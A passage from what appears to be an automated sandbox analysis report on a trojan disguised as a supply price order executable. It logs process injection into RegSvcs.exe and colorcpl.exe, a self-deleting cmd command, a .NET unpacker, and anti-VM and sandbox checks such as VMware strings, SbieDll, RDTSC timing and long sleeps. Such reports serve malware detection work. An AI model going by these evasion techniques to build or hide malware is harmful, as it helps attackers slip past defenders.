          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0467AD30 NtSetContextThread,14_2_0467AD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046795F0 NtQueryInformationFile,14_2_046795F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046799D0 NtCreateProcessEx,14_2_046799D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679670 NtQueryInformationProcess,14_2_04679670
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679A20 NtResumeThread,14_2_04679A20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679A00 NtProtectVirtualMemory,14_2_04679A00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679610 NtEnumerateValueKey,14_2_04679610
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679A10 NtQuerySection,14_2_04679A10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679A80 NtOpenDirectoryObject,14_2_04679A80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679760 NtOpenProcess,14_2_04679760
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679770 NtSetInformationFile,14_2_04679770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0467A770 NtOpenThread,14_2_0467A770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679730 NtQueryVirtualMemory,14_2_04679730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679B00 NtSetValueKey,14_2_04679B00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0467A710 NtOpenProcessToken,14_2_0467A710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046797A0 NtUnmapViewOfSection,14_2_046797A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0467A3B0 NtGetContextThread,14_2_0467A3B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025B8680 NtReadFile,14_2_025B8680
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025B8700 NtClose,14_2_025B8700
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025B87B0 NtAllocateVirtualMemory,14_2_025B87B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025B85D0 NtCreateFile,14_2_025B85D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025B867A NtReadFile,14_2_025B867A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025B86FB NtClose,14_2_025B86FB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025B872A NtClose,14_2_025B872A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025B87AA NtAllocateVirtualMemory,14_2_025B87AA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025B85CB NtCreateFile,14_2_025B85CB
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.267392729.000000000169B000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SUPPLY_PRICE_ORDER_9978484DF.exe
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000000.241253374.0000000000F04000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUCOMIRunningObjectTab.exe4 vs SUPPLY_PRICE_ORDER_9978484DF.exe
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.268283403.00000000032CF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameColladaLoader.dll4 vs SUPPLY_PRICE_ORDER_9978484DF.exe
          Source: SUPPLY_PRICE_ORDER_9978484DF.exeBinary or memory string: OriginalFilenameUCOMIRunningObjectTab.exe4 vs SUPPLY_PRICE_ORDER_9978484DF.exe
          Source: SUPPLY_PRICE_ORDER_9978484DF.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SUPPLY_PRICE_ORDER_9978484DF.exeVirustotal: Detection: 28%
          Source: SUPPLY_PRICE_ORDER_9978484DF.exeReversingLabs: Detection: 28%
          Source: SUPPLY_PRICE_ORDER_9978484DF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exe 'C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exe'
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'Jump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SUPPLY_PRICE_ORDER_9978484DF.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@10/6
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: SUPPLY_PRICE_ORDER_9978484DF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SUPPLY_PRICE_ORDER_9978484DF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: RegSvcs.pdb, source: colorcpl.exe, 0000000E.00000002.514451797.0000000004B47000.00000004.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, colorcpl.exe, 0000000E.00000002.513603550.000000000472F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, colorcpl.exe
          Source: Binary string: RegSvcs.pdb source: colorcpl.exe, 0000000E.00000002.514451797.0000000004B47000.00000004.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041B87C push eax; ret 3_2_0041B882
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041B812 push eax; ret 3_2_0041B818
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041B81B push eax; ret 3_2_0041B882
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041603B push eax; ret 3_2_0041603C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041B148 pushad ; ret 3_2_0041B14B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004152B0 pushad ; retf 3_2_004152B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004105D2 push ebp; ret 3_2_004105D3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004156A7 push ss; ret 3_2_004156AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041B7C5 push eax; ret 3_2_0041B818
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011CD0D1 push ecx; ret 3_2_011CD0E4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0468D0D1 push ecx; ret 14_2_0468D0E4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025B52B0 pushad ; retf 14_2_025B52B8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025BB87C push eax; ret 14_2_025BB882
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025BB81B push eax; ret 14_2_025BB882
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025BB812 push eax; ret 14_2_025BB818
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025B603B push eax; ret 14_2_025B603C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025BB148 pushad ; ret 14_2_025BB14B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025B56A7 push ss; ret 14_2_025B56AA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025BB7C5 push eax; ret 14_2_025BB818
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025B05D2 push ebp; ret 14_2_025B05D3
          Source: initial sampleStatic PE information: section name: .text entropy: 6.98098108885
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.SUPPLY_PRICE_ORDER_9978484DF.exe.32a8610.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.268187190.0000000003251000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.268283403.00000000032CF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SUPPLY_PRICE_ORDER_9978484DF.exe PID: 1892, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.268283403.00000000032CF000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.268283403.00000000032CF000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000025A8614 second address: 00000000025A861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000025A89AE second address: 00000000025A89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exe TID: 4668Thread sleep time: -36912s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exe TID: 5448Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 5188Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004088E0 rdtsc 3_2_004088E0
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeThread delayed: delay time: 36912Jump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000004.00000000.298156044.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.298156044.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.268283403.00000000032CF000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.319280852.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.268283403.00000000032CF000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.319280852.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000004.00000000.293429138.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.319280852.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000004.00000000.318990974.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000004.00000000.318990974.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.295878400.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.268283403.00000000032CF000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.268283403.00000000032CF000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004088E0 rdtsc 3_2_004088E0
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01179100 mov eax, dword ptr fs:[00000030h]3_2_01179100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01179100 mov eax, dword ptr fs:[00000030h]3_2_01179100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01179100 mov eax, dword ptr fs:[00000030h]3_2_01179100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A513A mov eax, dword ptr fs:[00000030h]3_2_011A513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A513A mov eax, dword ptr fs:[00000030h]3_2_011A513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01194120 mov eax, dword ptr fs:[00000030h]3_2_01194120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01194120 mov eax, dword ptr fs:[00000030h]3_2_01194120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01194120 mov eax, dword ptr fs:[00000030h]3_2_01194120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01194120 mov eax, dword ptr fs:[00000030h]3_2_01194120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01194120 mov ecx, dword ptr fs:[00000030h]3_2_01194120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0119B944 mov eax, dword ptr fs:[00000030h]3_2_0119B944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0119B944 mov eax, dword ptr fs:[00000030h]3_2_0119B944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0117B171 mov eax, dword ptr fs:[00000030h]3_2_0117B171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0117B171 mov eax, dword ptr fs:[00000030h]3_2_0117B171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0117C962 mov eax, dword ptr fs:[00000030h]3_2_0117C962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A2990 mov eax, dword ptr fs:[00000030h]3_2_011A2990
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0119C182 mov eax, dword ptr fs:[00000030h]3_2_0119C182
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011AA185 mov eax, dword ptr fs:[00000030h]3_2_011AA185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F51BE mov eax, dword ptr fs:[00000030h]3_2_011F51BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F51BE mov eax, dword ptr fs:[00000030h]3_2_011F51BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F51BE mov eax, dword ptr fs:[00000030h]3_2_011F51BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F51BE mov eax, dword ptr fs:[00000030h]3_2_011F51BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F69A6 mov eax, dword ptr fs:[00000030h]3_2_011F69A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A61A0 mov eax, dword ptr fs:[00000030h]3_2_011A61A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A61A0 mov eax, dword ptr fs:[00000030h]3_2_011A61A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012041E8 mov eax, dword ptr fs:[00000030h]3_2_012041E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0117B1E1 mov eax, dword ptr fs:[00000030h]3_2_0117B1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0117B1E1 mov eax, dword ptr fs:[00000030h]3_2_0117B1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0117B1E1 mov eax, dword ptr fs:[00000030h]3_2_0117B1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F7016 mov eax, dword ptr fs:[00000030h]3_2_011F7016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F7016 mov eax, dword ptr fs:[00000030h]3_2_011F7016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F7016 mov eax, dword ptr fs:[00000030h]3_2_011F7016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01244015 mov eax, dword ptr fs:[00000030h]3_2_01244015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01244015 mov eax, dword ptr fs:[00000030h]3_2_01244015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0118B02A mov eax, dword ptr fs:[00000030h]3_2_0118B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0118B02A mov eax, dword ptr fs:[00000030h]3_2_0118B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0118B02A mov eax, dword ptr fs:[00000030h]3_2_0118B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0118B02A mov eax, dword ptr fs:[00000030h]3_2_0118B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A002D mov eax, dword ptr fs:[00000030h]3_2_011A002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A002D mov eax, dword ptr fs:[00000030h]3_2_011A002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A002D mov eax, dword ptr fs:[00000030h]3_2_011A002D
